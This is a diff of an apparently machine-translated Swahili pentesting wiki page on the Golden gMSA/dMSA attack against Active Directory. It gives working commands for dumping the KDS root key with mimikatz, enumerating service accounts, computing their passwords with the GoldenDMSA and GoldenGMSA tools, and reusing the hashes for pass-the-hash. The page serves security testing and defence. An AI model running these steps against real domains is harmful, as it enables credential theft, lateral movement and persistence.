Translated ['src/windows-hardening/active-directory-methodology/golden-d

src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md

@@ -8,11 +8,11 @@ Windows Managed Service Accounts (MSA) ni wakala maalum walioundwa kuendesha hud
 Kuna ladha mbili kuu:
 
 1. **gMSA** – kundi la Akaunti ya Huduma ya Usimamizi – inaweza kutumika kwenye mwenyeji wengi ambao wameidhinishwa katika sifa yake ya `msDS-GroupMSAMembership`.
-2. **dMSA** – Akaunti ya Huduma ya Usimamizi iliyotolewa – mrithi (preview) wa gMSA, inategemea usimbaji sawa lakini inaruhusu hali za ugawaji zenye granular zaidi.
+2. **dMSA** – Akaunti ya Huduma ya Usimamizi iliyotolewa – mrithi (preview) wa gMSA, inategemea usimbuaji sawa lakini inaruhusu hali za ugawaji zenye granular zaidi.
 
-Kwa toleo zote mbili **nywila haihifadhiwi** kwenye Kituo cha Kikoa (DC) kama hash ya kawaida ya NT. Badala yake kila DC inaweza **kuvuta** nywila ya sasa kwa wakati kutoka:
+Kwa toleo zote mbili **nywila haihifadhiwi** kwenye kila Kituo cha Kikoa (DC) kama hash ya kawaida ya NT. Badala yake kila DC inaweza **kuvuta** nywila ya sasa kwa wakati kutoka:
 
-* Funguo ya KDS Root Key ya msitu mzima (`KRBTGT\KDS`) – siri yenye jina la GUID iliyozalishwa kwa bahati nasibu, iliyorekebishwa kwa kila DC chini ya kontena ya `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …`.
+* Funguo ya KDS Root Key ya msitu mzima (`KRBTGT\KDS`) – siri yenye jina la GUID iliyozalishwa kwa bahati nasibu, iliyorejelewa kwa kila DC chini ya kontena ya `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …`.
 * Akaunti ya lengo **SID**.
 * **ManagedPasswordID** (GUID) ya kila akaunti inayopatikana katika sifa ya `msDS-ManagedPasswordId`.
 
@@ -21,9 +21,8 @@ Hakuna trafiki ya Kerberos au mwingiliano wa kikoa unahitajika wakati wa matumiz
 
 ## Golden gMSA / Golden dMSA Attack
 
-Ikiwa mshambuliaji anaweza kupata ingizo zote tatu **offline** wanaweza kuhesabu **nywila halali za sasa na za baadaye** kwa **kila gMSA/dMSA katika msitu** bila kugusa DC tena, wakiepuka:
+Ikiwa mshambuliaji anaweza kupata ingizo zote tatu **bila mtandao** wanaweza kuhesabu **nywila halali za sasa na za baadaye** kwa **kila gMSA/dMSA katika msitu** bila kugusa DC tena, wakiepuka:
 
-* Kurejelewa kwa Kerberos / kumbukumbu za ombi la tiketi
 * Ukaguzi wa kusoma LDAP
 * Vipindi vya kubadilisha nywila (wanaweza kuhesabu mapema)
 
@@ -31,11 +30,12 @@ Hii ni sawa na *Golden Ticket* kwa akaunti za huduma.
 
 ### Prerequisites
 
-1. **Kuvunjika kwa kiwango cha msitu** cha **DC moja** (au Msimamizi wa Biashara). Upatikanaji wa `SYSTEM` unatosha.
+1. **Kuvunjika kwa kiwango cha msitu** cha **DC moja** (au Msimamizi wa Biashara), au ufikiaji wa `SYSTEM` kwa moja ya DCs katika msitu.
-2. Uwezo wa kuorodhesha akaunti za huduma (kusoma LDAP / RID brute-force).
+2. Uwezo wa kuhesabu akaunti za huduma (kusoma LDAP / RID brute-force).
 3. .NET ≥ 4.7.2 x64 workstation ili kuendesha [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) au msimbo sawa.
 
-### Phase 1 – Extract the KDS Root Key
+### Golden gMSA / dMSA
+##### Phase 1 – Extract the KDS Root Key
 
 Dump kutoka kwa DC yoyote (Volume Shadow Copy / raw SAM+SECURITY hives au siri za mbali):
 ```cmd
@@ -45,16 +45,25 @@ reg save HKLM\SYSTEM  system.hive
 # With mimikatz on the DC / offline
 mimikatz # lsadump::secrets
 mimikatz # lsadump::trust /patch   # shows KDS root keys too
+
+# With GoldendMSA
+GoldendMSA.exe kds --domain <domain name>   # query KDS root keys from a DC in the forest
+GoldendMSA.exe kds
+
+# With GoldenGMSA
+GoldenGMSA.exe kdsinfo
 ```
-The base64 string labelled `RootKey` (GUID name) is required in later steps.
+Mfuatano wa base64 uliopewa jina `RootKey` (jina la GUID) unahitajika katika hatua za baadaye.
 
-### Phase 2 – Enumerate gMSA/dMSA objects
+##### Awamu ya 2 – Tambua vitu vya gMSA / dMSA
 
-Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
+Pata angalau `sAMAccountName`, `objectSid` na `msDS-ManagedPasswordId`:
 ```powershell
 # Authenticated or anonymous depending on ACLs
 Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
 Select sAMAccountName,objectSid,msDS-ManagedPasswordId
+
+GoldenGMSA.exe gmsainfo
 ```
 [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) inatekeleza hali za msaada:
 ```powershell
@@ -64,9 +73,9 @@ GoldendMSA.exe info -d example.local -m ldap
 # RID brute force if anonymous binds are blocked
 GoldendMSA.exe info -d example.local -m brute -r 5000 -u jdoe -p P@ssw0rd
 ```
-### Phase 3 – Guess / Discover the ManagedPasswordID (when missing)
+##### Awamu ya 3 – Kadiria / Gundua ManagedPasswordID (wakati haipo)
 
-Baadhi ya matumizi *hutoa* `msDS-ManagedPasswordId` kutoka kwa usomaji unaolindwa na ACL. 
+Baadhi ya matumizi *hutoa* `msDS-ManagedPasswordId` kutoka kwa usomaji uliohifadhiwa na ACL. 
 Kwa sababu GUID ni 128-bit, brute force ya kijinga haiwezekani, lakini:
 
 1. **Bits 32 za kwanza = wakati wa epoch wa Unix** wa uundaji wa akaunti (ufafanuzi wa dakika).
@@ -78,15 +87,13 @@ GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUI
 ```
 Chombo kinahesabu nywila za wagombea na kulinganisha blob yao ya base64 dhidi ya sifa halisi ya `msDS-ManagedPassword` – mechi inaonyesha GUID sahihi.
 
-### Awamu ya 4 – Hesabu ya Nywila ya Kuzima & Kubadilisha
+##### Awamu ya 4 – Hesabu ya Nywila ya Kazi na Ubadilishaji
 
-Mara tu ID ya ManagedPassword inajulikana, nywila halali iko umbali wa amri moja:
+Mara tu ManagedPasswordID inajulikana, nywila halali iko umbali wa amri moja:
 ```powershell
 # derive base64 password
-GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID>
+GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKey ID>
-
+GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>
-# convert to NTLM / AES keys for pass-the-hash / pass-the-ticket
-GoldendMSA.exe convert -d example.local -u svc_web$ -p <Base64Pwd>
 ```
 Hashi zinazotokana zinaweza kuingizwa kwa **mimikatz** (`sekurlsa::pth`) au **Rubeus** kwa matumizi mabaya ya Kerberos, kuruhusu **lateral movement** ya siri na **persistence**.
 
@@ -101,12 +108,14 @@ Hashi zinazotokana zinaweza kuingizwa kwa **mimikatz** (`sekurlsa::pth`) au **Ru
 ## Tooling
 
 * [`Semperis/GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) – utekelezaji wa rejeleo unaotumika katika ukurasa huu.
+* [`Semperis/GoldenGMSA`](https://github.com/Semperis/GoldenGMSA/) – utekelezaji wa rejeleo unaotumika katika ukurasa huu.
 * [`mimikatz`](https://github.com/gentilkiwi/mimikatz) – `lsadump::secrets`, `sekurlsa::pth`, `kerberos::ptt`.
 * [`Rubeus`](https://github.com/GhostPack/Rubeus) – pass-the-ticket kwa kutumia funguo za AES zilizotokana.
 
 ## References
 
 - [Golden dMSA – authentication bypass for delegated Managed Service Accounts](https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/)
+- [gMSA Active Directory Attacks Accounts](https://www.semperis.com/blog/golden-gmsa-attack/)
 - [Semperis/GoldenDMSA GitHub repository](https://github.com/Semperis/GoldenDMSA)
 - [Improsec – Golden gMSA trust attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)